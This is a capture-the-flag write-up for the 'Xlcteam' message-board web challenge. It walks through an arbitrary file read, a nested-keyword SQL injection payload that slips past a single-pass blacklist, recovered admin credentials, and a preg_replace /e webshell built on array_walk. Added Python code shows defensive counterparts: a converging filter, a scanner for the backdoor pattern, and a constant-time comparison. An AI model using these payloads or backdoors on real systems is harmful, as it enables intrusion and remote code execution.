
[Xlcteam] (Web) Xlcteam Customer Message Board

2017-11-02  Reached 231 readers  王一航

Challenge URL:
http://cms.nuptzj.cn


Looking at the page source shows:

This looks like an arbitrary file download.

http://cms.nuptzj.cn/about.php?file=so.php


Injection is possible, as long as the payload avoids single quotes, double quotes and the other characters that mysql_real_escape_string escapes.

Before that, user input is also passed through a function called antiinject.

Its source can be read through the arbitrary file read vulnerability:

antiinject.php

<?php
function antiinject($content){
    // the two quote entries were garbled in the listing; reconstructed here as ' and "
    $keyword=array('select','union','and','from',' ','\'',';','"','char','or','count','master','name','pass','admin','+','-','order','=');
    $info=strtolower($content);
    // one str_replace per keyword, applied a single time in list order
    for($i=0;$i<=count($keyword);$i++){
     $info=str_replace($keyword[$i], '',$info);
    }
    return $info;
}
?>

It replaces union, select and the other keywords with an empty string, but only once, so a spelling such as seselectlect survives the filter.
The payload is therefore:

soid=1/**/ununionion/**/seleselectct/**/1,2,3,4/**/limit/**/1,1
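As an added example (not code from the original writeup), here is a Python port of antiinject() next to a fixed-point variant and the check a defender would run to see whether any blacklisted token survives the filter. The two quote entries of the keyword list are reconstructed from the garbled listing, and the function names are mine.

```python
# Keyword list as it appears in the challenge's antiinject.php; the two quote
# entries were garbled in the listing and are reconstructed here as ' and ".
KEYWORDS = ['select', 'union', 'and', 'from', ' ', "'", ';', '"', 'char', 'or',
            'count', 'master', 'name', 'pass', 'admin', '+', '-', 'order', '=']


def antiinject_once(content: str) -> str:
    """Port of the page's antiinject(): lower-case the input, then run one
    sequential str_replace() per keyword, in list order, exactly once."""
    info = content.lower()
    for kw in KEYWORDS:
        info = info.replace(kw, '')
    return info


def antiinject_stable(content: str, max_rounds: int = 50) -> str:
    """Re-apply the stripping until the text stops changing, so a nested
    spelling such as seselectlect cannot leave a keyword behind."""
    info = content.lower()
    for _ in range(max_rounds):
        stripped = antiinject_once(info)
        if stripped == info:
            return info
        info = stripped
    raise ValueError("filter did not converge")


def leftover_keywords(filtered: str) -> list:
    """Defender's check: which blacklist entries are still present after
    filtering? Anything non-empty here means the filter failed."""
    return [kw for kw in KEYWORDS if kw in filtered]


if __name__ == "__main__":
    # constructed inputs: the writeup's payload and an ordinary word
    for sample in ("seselectlect",
                   "1/**/ununionion/**/seleselectct/**/1,2,3,4/**/limit/**/1,1",
                   "password"):
        print(repr(sample), "->", repr(antiinject_once(sample)),
              "leftover:", leftover_keywords(antiinject_once(sample)),
              "stable:", repr(antiinject_stable(sample)))
```

Running the writeup's payload through antiinject_once() leaves a clean union/select statement, which is exactly what leftover_keywords() reports. The fixed-point version closes that gap but is still not a fix: it silently mangles legitimate input (the word "password" becomes "wd", since "or" and then "pass" are stripped), and a blacklist can never anticipate every spelling. The proper mitigation is a parameterised query, with the input never spliced into SQL text at all.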
Table names:
admin
    username
    userpass
        admin, 102 117 99 107 114 117 110 116 117
filename
    id
    path
        1,compass.php
        2,arlogined.php
hackerip
message
    say
    nice

This gives the backend username and password:

admin/fuckruntu

The backend address is found here:

http://cms.nuptzj.cn/loginxlcteam/index.php

Reading the source of the small webshell shows it is a PHP preg_replace backdoor; it can be used directly.

<?php
// the callback name comes straight from the request
$e = $_REQUEST['www'];
// one-element array: key = user-supplied string, value = a regex with the /e modifier
$arr = array($_POST['wtf'] => '|.*|e',);
// array_walk calls $e(value, key, userdata), i.e. $e('|.*|e', $_POST['wtf'], '')
array_walk($arr, $e, '');
?>

http://php.net/manual/zh/function.array-walk.php
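The backdoor contains neither eval() nor a literal preg_replace() call, so a grep for those names misses it. As an added example (not from the writeup), here is a small Python source scanner that flags the two properties that make this snippet dangerous: a quoted regex literal carrying the /e modifier, and a callback-taking function whose callable comes from a request superglobal. The sample PHP inputs are constructed for the demonstration, and the function names are mine.

```python
import re

# Constructed sample: the small webshell quoted in the writeup.
BACKDOOR_SRC = r"""<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>"""

# Constructed clean sample for comparison: fixed callback, regex without /e.
CLEAN_SRC = r"""<?php
$names = array('a', 'b');
array_walk($names, 'strtoupper');
echo preg_replace('/\s+/', ' ', $_GET['q']);
?>"""

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

# Functions that take a callable; the callable must never be chosen by the client.
CALLBACK_SINKS = ("array_walk", "array_map", "usort", "uasort", "uksort",
                  "call_user_func", "call_user_func_array", "array_filter",
                  "array_reduce", "register_shutdown_function")

# A quoted regex literal whose modifier set contains e, e.g. '|.*|e' or "/x/ie".
E_MODIFIER = re.compile(r"""(['"])([^\w\s\\'"])(.*?)\2([A-Za-z]*e[A-Za-z]*)\1""")


def tainted_variables(src: str) -> set:
    """Names of variables assigned directly from a request superglobal."""
    return set(re.findall(r"\$(\w+)\s*=\s*" + SUPERGLOBAL, src))


def scan_php(src: str) -> list:
    """Return (line number, description) findings for one PHP file."""
    findings = []
    tainted = tainted_variables(src)
    for lineno, line in enumerate(src.splitlines(), 1):
        if E_MODIFIER.search(line):
            findings.append((lineno, "regex literal with /e modifier"))
        for fn in CALLBACK_SINKS:
            m = re.search(re.escape(fn) + r"\s*\((.*)\)", line)
            if not m:
                continue
            args = m.group(1)
            from_request = re.search(SUPERGLOBAL, args) is not None
            from_tainted = any(re.search(r"\$" + re.escape(v) + r"\b", args)
                               for v in tainted)
            if from_request or from_tainted:
                findings.append((lineno, f"{fn}() with request-controlled callback"))
    return findings


if __name__ == "__main__":
    for label, src in (("backdoor", BACKDOOR_SRC), ("clean", CLEAN_SRC)):
        print(label, scan_php(src))
```

The taint tracking is deliberately shallow (one direct assignment from a superglobal); it is meant as a triage pass over a web root, not as a replacement for a real static analyser. Note that the /e modifier has been removed from PHP altogether since 7.0, so on a current interpreter this particular backdoor no longer works, but the request-controlled callback pattern still does.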

But many functions appear to be disabled:

symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset

The disabled functions have to be worked around by hand to get the flag.
Reference:

http://www.jianshu.com/p/33bc37ef72cc

Array
(
    [0] => .
    [1] => ..
    [2] => about.php
    [3] => antiinject.php
    [4] => antixss.php
    [5] => config.php
    [6] => index.php
    [7] => list.php
    [8] => loginxlcteam
    [9] => passencode.php
    [10] => preview.php
    [11] => say.php
    [12] => sm.txt
    [13] => so.php
    [14] => xlcteam.php
    [15] => 恭喜你获得flag2.txt
)
Array
(
    [0] => .
    [1] => ..
    [2] => arlogined.php
    [3] => conpass.php
    [4] => index.php
)

Continuing with file_get_contents:

<?php
// backend login
include './../config.php';
include './../passencode.php';
session_start();
$username=$_POST['username'];
$userpass=$_POST['userpass'];
if($username=="" || $userpass==""){
    echo "<script>alert('用户名或密码不能为空!');window.location = './index.php'</script>";
    exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$username=mysql_real_escape_string($username);
$userpass=passencode($userpass);

$result=mysql_query("SELECT * FROM admin WHERE username='$username'",$con);
// Do you know how much time I wasted writing this vulnerable password check algorithm?! *sob*
if(mysql_num_rows($result)<=0){
    echo "<script>alert('用户名不存在');window.location = './index.php'</script>";
    mysql_free_result($result);
    mysql_close($con);
    exit();
}

while($rs=mysql_fetch_array($result)){
    if($rs['username']==$username){
        if(strlen($userpass)!=strlen($rs['userpass'])){
            echo "<script>alert('密码错误:长度不一致!');window.location = './index.php'</script>";
            mysql_free_result($result);
            mysql_close($con);
            exit();
        }
    }
    for($i=0;$i<=strlen($userpass);++$i){
        if(strncmp($userpass,$rs['userpass'],$i)!=0){
            echo "<script>alert('密码错误:比较第 $i 位错误!');window.location = './index.php'</script>";
            break;
        }else{
            if($i==strlen($userpass)){
                $_SESSION['state']="已登录";
                setcookie('username','');
                setcookie('userpass','');
                setcookie('username',"$username",time()+1200,"/");
                setcookie('userpass',"$userpass",time()+1200,"/");
                $file=mysql_query("SELECT * FROM filename where id=2");
                $path=mysql_fetch_array($file);
                echo "<script>window.location = '".$path['path']."'</script>";
                mysql_free_result($result);
                mysql_free_result($file);
                mysql_close($con);
                exit();
            }
        }
    }
    mysql_free_result($result);
    mysql_close($con);
}
?>
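The author's own comment calls this password check vulnerable, and the reason is visible in the loop: it compares prefixes of growing length with strncmp and tells the client, in the alert text, at which position the comparison first failed (or that the length was wrong). That turns a yes/no check into an oracle that confirms one character at a time. As an added example (not from the writeup), the Python below mirrors that logic beside a constant-time comparison that reports nothing but a single boolean. passencode() is not shown on the page; the version here (space-separated decimal character codes) is an assumption based on the form of the stored value in the admin table dump.

```python
import hmac


def passencode(userpass: str) -> str:
    """Assumed stand-in for the site's passencode(): the admin dump shows the
    stored value as space-separated decimal character codes."""
    return ' '.join(str(ord(c)) for c in userpass)


def check_like_conpass(submitted: str, stored: str):
    """Mirror of the writeup's loop: a length check first, then strncmp over
    prefixes of length 0..len. Returns (accepted, leaked_detail), where
    leaked_detail is what the page's alert text would reveal: the string
    "length", or the first prefix length i at which the two values differ."""
    if len(submitted) != len(stored):
        return False, "length"
    for i in range(len(submitted) + 1):
        if submitted[:i] != stored[:i]:
            return False, i
    return True, None


def check_constant_time(submitted: str, stored: str) -> bool:
    """Compare the whole encoded value in one step and return only a boolean:
    no position, and no length difference, is ever reported to the client."""
    return hmac.compare_digest(submitted.encode(), stored.encode())


if __name__ == "__main__":
    # constructed credentials for the demonstration
    stored = passencode("abcd")
    for guess in ("abcd", "abce", "abxd"):
        print(guess, check_like_conpass(passencode(guess), stored),
              check_constant_time(passencode(guess), stored))
```

With the constructed values, "abce" differs from "abcd" only in the last code, so the page's logic reports failure at prefix length 12, while "abxd" encodes to a different length and is rejected with the "length" message; the constant-time check returns False for both with no further detail. Beyond the comparison itself, the stored value should be a salted password hash rather than a reversible encoding, and a failed login should produce one generic message regardless of which part of the credential was wrong.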
<?php
session_start();
if(!isset($_SESSION['state'])){
echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
exit();
}else{
if($_SESSION['state']!="已登录"){
echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
exit();
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Xlcteam留言板系统后台</title>
</head>

<body>
<center>
    <h1>恭喜你已拿下后台,离爆菊只差一步了flag1:nctf{}</h1>
  <p>&nbsp;</p>
  <hr />
  <h3>能来到这里,相信也不是只会用工具的脚本小子了</h3>
  <h3>现在离爆菊只差一步了</h3>
  <hr />
  <h3>因为程序猿连后台都懒得开发了,为了方便管理,他邪恶地放了一个一句话木马在网站的根目录下<br />
    小马的文件名为:xlcteam.php
        <?php /*
        include './../config.php';
        $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
    mysql_select_db($db_name,$con);
    mysql_query("set names gb2312");
        $file=mysql_query("SELECT * FROM filename where id=3");
    $filename=mysql_fetch_array($file);
        echo $filename['name'];*/
        ?>
         </h3>
        <hr />
        <h4>黑阔,哎哟~不错哦
    </h4>
</center>
</body>
</html>